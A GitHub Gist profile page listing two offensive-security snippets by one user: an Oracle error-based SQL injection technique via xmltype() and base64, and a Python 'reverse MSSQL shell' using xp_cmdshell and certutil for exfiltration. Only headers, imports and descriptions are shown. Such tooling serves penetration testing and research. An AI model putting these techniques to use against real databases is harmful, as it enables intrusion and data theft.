Skip to content

Instantly share code, notes, and snippets.

Pablo xassiz

Block or report user

Report or block xassiz

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
xassiz / oracle_error-based_xmltype.sql
Created Apr 17, 2018
Optimized Oracle error-based SQL injection technique via xmltype() + base64
View oracle_error-based_xmltype.sql
* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
* @author: xassiz
select ''||
xassiz /
Created Mar 16, 2018
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
You can’t perform that action at this time.